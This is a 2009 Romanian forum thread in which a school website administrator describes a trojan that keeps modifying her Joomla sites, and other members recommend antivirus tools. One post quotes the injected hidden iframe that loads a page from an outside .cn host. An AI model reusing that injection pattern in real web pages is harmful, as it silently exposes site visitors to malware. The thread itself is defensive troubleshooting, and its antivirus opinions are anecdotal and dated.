eroare...de la troian?

Discutii despre Joomla, Mambo

Moderator: Moderatori

kristina_racoasa
Average Member
Mesaje: 121
Membru din: Mie Sep 24, 2008 9:08 pm

eroare...de la troian?

Mesajde kristina_racoasa » Lun Mar 23, 2009 9:50 pm

Buna seara. De cateva zile ma confrunt cu ceva probleme. Am fost lovita de un troian si primesc eroare digeste.dll . Asta nu ar fi o problema. La site/ul scolii pe care il administrez apare aceasta eroare: Parse error: syntax error, unexpected '<' in /www/scoalaracoasa.scoli.edu.ro/htdocs/index.php on line 88. Cand am intrat la admin sa vad ce este am fost anuntata ca un troian m/a lovit.Am reparat site/ul, am reinstalat windowsul si cand ma uit la site era la fel. intru iar in admin si hop...acelasi troian. Acum am instalat ubuntu si sa vad ce pot face. problema si mai mare este ca mai am un site *anarex2007.ro si acolo vad ca a aparut aceeasi problema dupa ce m/a lovit troianul acela. ce ma sfatuiti, ce sa fac?[/b]



Avatar utilizator
Birkoff
Senior Member
Mesaje: 6378
Membru din: Joi Mar 18, 2004 2:34 pm
Localitate: Bucuresti
Contact:

Mesajde Birkoff » Lun Mar 23, 2009 10:41 pm

da antivirus nu ai pe acele calculatoare? pana nu scoti troianul orice ai face e in zadar... foloseste si tu (daca e windows) avg (ca e free) pentru virusi, apoi scaneaza si cu adaware de la lavasoft (care si ala e free) si apoi incearca sa repari ce a facut troianul prin script... si verifica apoi codul cu acunetix versiunea free ce galme ai prin codul site-ului si rezolva-le ca sa nu iti mai intre gargauni...

sau apeleaza la cineva care se pricepe ca sa te scape de gargauni...
1) CMS, ERP, CRM, etc... (doar pentru clienti))
2) Portofoliu, servicii, contact, blog
3) Folositi aceasta clasa sql in proiectele voastre (open source)
4) Vrei un magazin virtual la cheie, usor de folosit, cu api-uri incluse pentru maximizarea vanzarilor si multe alte facilitati? Da un semn si discutam.

kristina_racoasa
Average Member
Mesaje: 121
Membru din: Mie Sep 24, 2008 9:08 pm

Mesajde kristina_racoasa » Lun Mar 23, 2009 10:46 pm

antivirus am(acum avast) dar am avut si kys 2009 si tot a intrat. problema este ca intra doar cand accesez panoul de admin al site-ului. imi adauga la indeh.php aceasta linie:<html><body><iframe src="http://namesupermart.cn/in.cgi?income20" width=1 height=1 style="visibility: hidden"></iframe></body></html> si nu stiu de unde...la ambele site-uir se intampla acelasi lucru.dupa ce sterg linia merge.

Avatar utilizator
Birkoff
Senior Member
Mesaje: 6378
Membru din: Joi Mar 18, 2004 2:34 pm
Localitate: Bucuresti
Contact:

Mesajde Birkoff » Lun Mar 23, 2009 11:07 pm

avg - scaneaza de virusi, troieni si malware si alte chestii asemanatoare
adaware - scaneaza de adavare, spyware si malware si alte chestii asemanatoare
acunetix - scaneaza site-ul de sql injection, xss si alte chestii asemanatoare

deci scaneaza cu toate ca sa fi sigura
1) CMS, ERP, CRM, etc... (doar pentru clienti))
2) Portofoliu, servicii, contact, blog
3) Folositi aceasta clasa sql in proiectele voastre (open source)
4) Vrei un magazin virtual la cheie, usor de folosit, cu api-uri incluse pentru maximizarea vanzarilor si multe alte facilitati? Da un semn si discutam.

kristina_racoasa
Average Member
Mesaje: 121
Membru din: Mie Sep 24, 2008 9:08 pm

Mesajde kristina_racoasa » Mar Mar 24, 2009 9:23 am

Troianul este in calculator ca primesc mereu eroare cu digeste.dll dar fiind formatat acum nu ma grabesc sa il fac pentru ca nu am ce pierde si poate depistez ceea ce se intampla. Acum cand intru pe la adminul site-urilor nu mai e nici o problema. Doar din cand in cand se deschide un fisier format pdf si imi cere sa dau accept.Normal ca nu ii dau. As face formatare dar mi-e frica sa nu o patesc din nou. Am instalat ubuntu si incerc sa ma familiarizez cu el. Apoi o sa fac reinstal si nu mai intru in panoul site-ului decat cu ubuntu.Cat despre acunetix nu a gasit nimic, sau poate nu ma pricep eu...inca mai explorez.

Avatar utilizator
Birkoff
Senior Member
Mesaje: 6378
Membru din: Joi Mar 18, 2004 2:34 pm
Localitate: Bucuresti
Contact:

Mesajde Birkoff » Mar Mar 24, 2009 11:38 am

haios este ca ieri cand citeam mesajele din rss feed, cand am ajuns la discutia asta ca sa o citesc mi-a sarit antivirusul in fata cu o alerta "exploit in pdf in cache de la browser"... nu sa intamplat nimic rau, doar ca daca nu iti instalezi un antivirus bun te vei infecta iar... si vei infecta la randul tau pe altii...
1) CMS, ERP, CRM, etc... (doar pentru clienti))
2) Portofoliu, servicii, contact, blog
3) Folositi aceasta clasa sql in proiectele voastre (open source)
4) Vrei un magazin virtual la cheie, usor de folosit, cu api-uri incluse pentru maximizarea vanzarilor si multe alte facilitati? Da un semn si discutam.

kristina_racoasa
Average Member
Mesaje: 121
Membru din: Mie Sep 24, 2008 9:08 pm

Mesajde kristina_racoasa » Mar Mar 24, 2009 12:29 pm

Am inteles. Imi puteti spune ce antivirus folositi?

Avatar utilizator
Birkoff
Senior Member
Mesaje: 6378
Membru din: Joi Mar 18, 2004 2:34 pm
Localitate: Bucuresti
Contact:

Mesajde Birkoff » Mar Mar 24, 2009 1:03 pm

unul care de-a lungul timpului sa dovedit cel mai bun ar fi norton (dar costa in jur de 100 usd...) dar eu pe calculator am avg si ce ti-am mai scris mai sus (am preferat versiuni free)
1) CMS, ERP, CRM, etc... (doar pentru clienti))
2) Portofoliu, servicii, contact, blog
3) Folositi aceasta clasa sql in proiectele voastre (open source)
4) Vrei un magazin virtual la cheie, usor de folosit, cu api-uri incluse pentru maximizarea vanzarilor si multe alte facilitati? Da un semn si discutam.

Avatar utilizator
mihaitha
Senior Member
Mesaje: 2383
Membru din: Vin Mai 04, 2007 12:40 pm
Localitate: Sibiu
Contact:

Mesajde mihaitha » Mie Mar 25, 2009 10:34 am

Recomand Avira (www.avira.ro). Ocupa putine resurse, e rapid si pana acum nu mi-a scapat nimic prin el.

kristina_racoasa
Average Member
Mesaje: 121
Membru din: Mie Sep 24, 2008 9:08 pm

Mesajde kristina_racoasa » Mie Mar 25, 2009 10:53 am

Momentat am activat trialul de la kaspersky 2008. Am gasit(de fapt altcineva)problema, sau asa cred. In index-ul site-ului erau mai multe modificari, dar eu nu ma uitam decat la linia indicata(88). O sa incerc sa fac un reinstal si sper sa rezolv. Va multumesc pentru interesul acordat subiectului! :D

gholem
Junior Member
Mesaje: 31
Membru din: Lun Mar 23, 2009 6:59 pm
Localitate: Piatra Neamt
Contact:

Mesajde gholem » Mie Mar 25, 2009 4:00 pm

kristina_racoasa scrie:Momentat am activat trialul de la kaspersky 2008. Am gasit(de fapt altcineva)problema, sau asa cred. In index-ul site-ului erau mai multe modificari, dar eu nu ma uitam decat la linia indicata(88). O sa incerc sa fac un reinstal si sper sa rezolv. Va multumesc pentru interesul acordat subiectului! :D


Sa incerci, daca poti, avast. Are optiunea de a scana inca de la bootare. Il lasi sa-si faca treaba si sa fii atenta la ce setari ii faci, ca sa nu-ti pierzi fisere bune. Din cate stiam, era gratuit...

Scanezi, rezolvi - unde se poate - problemele, apoi il dezinstalezi (sau nu) si-ti pui un antivirus cu care te impaci.
Ideea e ca nu exista nici un antivirus perfect si de obicei fiecare astfel de soft e cu un pas in urma ... pana la noul update.[/b]

kristina_racoasa
Average Member
Mesaje: 121
Membru din: Mie Sep 24, 2008 9:08 pm

Mesajde kristina_racoasa » Mie Mar 25, 2009 4:19 pm

A trecut prin avast ca prin branza. Mi-a dat mesajul la o secunda dupa ce am fost infectata.

Avatar utilizator
Birkoff
Senior Member
Mesaje: 6378
Membru din: Joi Mar 18, 2004 2:34 pm
Localitate: Bucuresti
Contact:

Mesajde Birkoff » Mie Mar 25, 2009 4:37 pm

timp de 7 ani am avut ocazia sa testez si sa vad multe firme atat in bucuresti cat si in tara care foloseau diferiti antivirusi... va spun ca in urma experientei mele, cele mai bune produse sunt norton internet security, mcaffe si atat.

celelalte produse, gen kaspersky, rav sau mai stiu eu care, toate firmele care le-au avut au avut nevoie de service datorita virusarii... ce era mai amuzant e ca unii antivirusi vedeau virusul da nu puteau sa il blocheze... si acesta se raspandea in toata reteaua firmei respective...

eu de 3 ani folosesc acasa avg, atata timp cat sunt atent si scanez regulat calculatorul si nu apas aiurea pe butoane cand ma avertizeaza de o problema totul e ok... inainte de avg am folosit norton, dar deoarece ocupa prea multe resurse am preferat sa nu il mai folosesc decat la job...

nici un produs nu e 100% sigur, totul depinde si de utilizator si de update-urile windowsului si a celorlalte aplicatii de care se foloseste.

in 7 ani am avut doar 3 probleme cu virusii sau malware si atunci a fost din vina mea nu din vina antivirusilor...

1. folositi un antivirus bun si actualizati si scanati saptamanal calculatorul
2. folositi in paralel si un program de tip adaware pentru a scana si ceea ce nu scaneaza ceilalti antivirusi
3. faceti backup cel putin odata pe saptamana, nici un calculator nu e sigur, poate sa se strice hardware sau software si sa nu va mai puteti recupera datele decat cu costuri imense...
4. cand observati probleme, scanati si cu o aplicatie online si faceti optimizare (recomand tuneup utilities sau ceva asemanator)

calculatorul e ca o masina, daca nu aveti grija de el va trebui sa il duceti foarte des la service... (mie imi convine, pe langa pagini web mai fac si service si imi convine ca firmele nu au habar sa isi intretina calculatoarele)
1) CMS, ERP, CRM, etc... (doar pentru clienti))
2) Portofoliu, servicii, contact, blog
3) Folositi aceasta clasa sql in proiectele voastre (open source)
4) Vrei un magazin virtual la cheie, usor de folosit, cu api-uri incluse pentru maximizarea vanzarilor si multe alte facilitati? Da un semn si discutam.

oceans
Senior Member
Mesaje: 504
Membru din: Mar Noi 13, 2007 3:06 pm

Mesajde oceans » Mie Mar 25, 2009 5:16 pm

De cand am Kaspersky Internet security, care contine protectie malware, content filtering, firewall, anti-phishing, intrusion prevention system, banner ad blocker, anti-spam, updates in fiecare zi nu am avut nicio problema. Inainte acum 3-4 ani foloseam norton(motivul era pentru ca venea instalat pe orice calculator sau laptop) si din cate imi amintesc era sub kaspersky cu mult. Am citit undeva intr-o revista de securitate ca s-a incercat introducerea de noi virusi pe cate un calculator fiecare avand kaspersky, norton si altele si cel mai repede l-a detectat kaspersky, nortonu fiind mult in spate. Dar fiecare cu experienta lui, eu unul nu am avut nicio problema pana acum.


Înapoi la “Joomla”

Cine este conectat

Utilizatori ce ce navighează pe acest forum: Niciun utilizator înregistrat și 2 vizitatori